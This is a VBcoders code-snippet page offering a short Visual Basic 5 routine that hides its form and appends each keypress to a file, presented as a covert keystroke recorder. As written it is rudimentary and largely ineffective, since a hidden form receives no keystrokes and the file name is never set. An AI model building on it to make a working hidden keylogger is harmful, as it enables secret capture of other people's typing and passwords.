VBcoders Guest



Don't have an account yet? Register
 


Forgot Password?



Hiden form which records keypress!

by splamoniMan (2 Submissions)
Category: String Manipulation
Compatability: Visual Basic 5.0
Difficulty: Unknown Difficulty
Originally Published: Tue 27th April 2004
Date Added: Mon 8th February 2021
Rating: (1 Votes)

Hiden form which records keypress!

Rate Hiden form which records keypress!




private sub form_keypress(keyascii as integer)
key$ = chr$(keyascii)
open file$ for append as #1
write #1, key$
close #1
end sub


private sub form_load()
me.visible = false
end sub

Download this snippet    Add to My Saved Code

Hiden form which records keypress! Comments

No comments have been posted about Hiden form which records keypress!. Why not be the first to post a comment about Hiden form which records keypress!.

Post your comment

Subject:
Message:
0/1000 characters